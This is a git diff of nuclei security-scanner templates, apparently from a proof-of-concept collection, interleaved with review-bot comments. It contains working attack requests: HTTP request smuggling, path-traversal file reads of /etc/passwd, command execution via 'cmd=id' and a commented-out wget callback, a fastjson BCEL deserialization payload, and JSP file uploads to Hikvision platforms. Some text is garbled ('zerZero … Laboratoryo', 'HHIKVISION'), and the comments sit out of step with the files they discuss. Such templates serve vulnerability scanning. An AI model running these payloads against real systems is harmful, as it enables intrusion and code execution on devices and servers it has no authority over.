GPOST")' +id: CL-TE-http-smuggling + +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low + +http: + - raw: + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file 
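Review bot: The only matcher in cl-te-http-smuggling.yaml is `contains(body, "Unrecognized method GPOST")`, which is the error text of the PortSwigger CL.TE lab backend; a real front/back-end pair that desynchronises will usually answer the prefixed `GPOST` with a generic 400/405 or a timeout, so the template is a lab verifier rather than a detector and will under-report in the wild. Either say so in `description` (e.g. `Matches the PortSwigger lab error string only; real targets need manual confirmation via timing or a differential response.`) or add a second matcher on the status/body of the second response. `severity: Low` should also be lowercased to `low` to match every other template in this commit.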
diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..cd961f6e81 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml 
@@ -1,35 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - - raw: - - | - POST /center/api/files;.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index b35ef84818..1cd783867f 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml 
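Review bot: The file keeps the path `poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml` and the generic `id: HiKVISION`, but its content is now an information-leak check against `/artemis-portal/artemis/env`; the name, the `poc/microsoft/` directory and the id no longer describe it, and the identical file also appears under `poc/upload/` (see the header at the end of this patch), so the id is duplicated. The `author` value `zerZero Trust Security Attack and Defense Laboratoryo` is a mangled search-and-replace of `Zero Trust Security Attack and Defense Laboratory` and should be restored. The body matcher `profiles` is weak on its own; if this endpoint is the Spring Boot actuator `env` output, as the path suggests, a more specific string such as `activeProfiles` or `propertySources` would cut false positives — please confirm against a real response before changing it.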
@@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml b/poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml new file mode 100644 index 0000000000..94b1dcb24b --- /dev/null +++ b/poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml 
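Review bot: The new `description` talks about an "arbitrary user login vulnerability" via `www/local_User.php`, while the `name` and the request (`/webconf/GetFile/index?path=../../../../etc/passwd`) describe an arbitrary file read; the description should match what the template actually does, e.g. `Path traversal in the GetFile endpoint allows unauthenticated reading of arbitrary files such as /etc/passwd.` The body matcher `nologin` is a reasonable passwd indicator but is weaker than the `root:[x*]:0:0` regex this commit uses in cve-2008-5587.yaml; using the same regex here keeps the two file-read templates consistent. The `id: Green-Alliance` is vendor-wide rather than check-specific and will clash with any other NSFOCUS template.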
@@ -0,0 +1,59 @@ +id: attire-018e03e3d84deb0b9ea4b368a9e735bb + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/other/events-calendar-pro.yaml b/poc/other/events-calendar-pro.yaml new file mode 100644 index 0000000000..d39c81e84a --- /dev/null +++ b/poc/other/events-calendar-pro.yaml 
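Review bot: `description:`, `cvss-metrics:`, `cvss-score:` and `cve-id:` are all empty, `shodan-query: 'vuln:'` is an incomplete query, and the tag list still starts with `cve` although no CVE is assigned; the empty classification keys should be removed (an empty `cvss-score` may not parse as a number in the loader — worth checking) and `cve` dropped from `tags` so the template is not selected by CVE-scoped runs. The Wordfence title is the only text describing the issue, so a one-line `description` such as `Attire theme <= 2.0.6 is vulnerable to PHP object injection by Contributor-level users (per Wordfence advisory).` would keep the finding self-explanatory. Detection is purely the `Version:` line of `style.css`, which should be stated as a version-only check.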
@@ -0,0 +1,59 @@ +id: events-calendar-pro + +info: + name: > + The Events Calendar Pro <= 7.0.2 - Authenticated (Administrator+) PHP Object Injection to Remote Code Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34f0e5a6-0bd3-4734-b7e0-27dc825d193f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/events-calendar-pro/" + google-query: inurl:"/wp-content/plugins/events-calendar-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,events-calendar-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/events-calendar-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "events-calendar-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.0.2') \ No newline at end of file diff --git a/poc/other/jenk.yaml b/poc/other/jenk.yaml index 1ce87d12b2..62a1aba442 100644 --- a/poc/other/jenk.yaml +++ b/poc/other/jenk.yaml @@ -53,4 +53,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 
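Review bot: As with the other unnumbered Wordfence imports in this commit, `description`, `cvss-metrics`, `cvss-score` and `cve-id` are empty, `shodan-query: 'vuln:'` is malformed, and `tags` begins with `cve` although there is no CVE; remove the empty keys and the `cve` tag and add a one-line description derived from the title. The Events Calendar Pro is a commercial plugin, so `wp-content/plugins/events-calendar-pro/readme.txt` may not be present or readable on many installs, which makes the version check silently miss them — a note such as `Relies on readme.txt being web-readable; premium installs may not expose it.` would explain the gap. The `id: events-calendar-pro` is the plugin slug, not a finding identifier, and will collide with any future template for the same plugin.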
diff --git a/poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml b/poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml new file mode 100644 index 0000000000..a4e88cf74a --- /dev/null +++ b/poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml @@ -0,0 +1,59 @@ +id: share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a + +info: + name: > + Share This Image <= 2.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via alignment Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/share-this-image/" + google-query: inurl:"/wp-content/plugins/share-this-image/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,share-this-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "share-this-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.01') \ No newline at end of file diff --git a/poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml b/poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml new file mode 100644 index 0000000000..97850623ba --- /dev/null +++ b/poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml 
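Review bot: The classification block is empty (`cvss-metrics:`, `cvss-score:`, `cve-id:`), `shodan-query: 'vuln:'` is truncated, and the `cve` tag is set without a CVE id; drop the empty keys and the `cve` tag rather than shipping placeholders that other tooling will parse as values. Add a short `description` from the title, e.g. `Share This Image <= 2.01 allows Contributor-level users to store XSS via the alignment parameter (per Wordfence).`, so the finding is readable without following the reference. The upper bound `'<= 2.01'` is copied from the advisory; please confirm that `compare_versions` treats `2.01` the way the plugin's own versioning does before relying on it.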
@@ -0,0 +1,59 @@ +id: td-composer-3b0822f9c769d60e753b8fc716feb8bc + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml b/poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml new file mode 100644 index 0000000000..258c78ae0d --- /dev/null +++ b/poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml 
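Review bot: Same placeholder problem as the other unnumbered imports: `description`, `cvss-metrics`, `cvss-score` and `cve-id` are empty, `shodan-query: 'vuln:'` is malformed, and `tags` includes `cve` with no CVE; remove the empty keys and the `cve` tag and add a one-line description built from the title. tagDiv Composer ships with commercial tagDiv themes rather than from wordpress.org, so the `readme.txt` probe may return nothing on many installs; the description should say the check is readme-version based and may miss bundled copies.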
@@ -0,0 +1,59 @@ +id: td-composer-a84bf528fd8a808bc88b049d18e64cda + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
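Review bot: This template is byte-for-byte the same check as `td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml` added just above — same name, same `readme.txt` path, same `'<= 5.0'` bound — differing only in the Wordfence reference UUID and the hash suffix of the `id`; every scan will report the finding twice. Keep one file and list both Wordfence references under `reference:`, e.g. add `- https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-scan` to the first template. The empty classification keys and the stray `cve` tag noted for the sibling apply here as well.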
@@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: 
word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml b/poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml new file mode 100644 index 0000000000..25665a01fa --- /dev/null +++ b/poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml 
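Review bot: The rewritten request uploads `test.jsp` to the target and then fetches `/eps/upload/{{name}}.jsp`, but nothing removes it afterwards, so every positive hit leaves a file on the customer's server; the body is only `{{randstr}}`, which is the right choice, but the `description` should state the side effect plainly (e.g. `Uploads a harmless JSP containing a random marker; the file is not deleted and must be cleaned up manually.`). The hard-coded `Content-Length: 184` is fragile because the multipart body contains a template-expanded value; unless `unsafe` raw sending is intended, drop the header and let the engine compute it. The file is still named `Hikvision_applyCT_RCE.yaml` and keeps `id: HIKVISION` although it no longer exercises `applyCT`, and `name`/`description` carry the typos `HHIKVISION` and `Platfor` while `author` has the mangled `zerZero Trust …` value seen elsewhere in this commit.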
@@ -0,0 +1,59 @@
+id: CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc
+
+info:
+ name: >
+ WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute
+ author: topscoder
+ severity: low
+ description: >
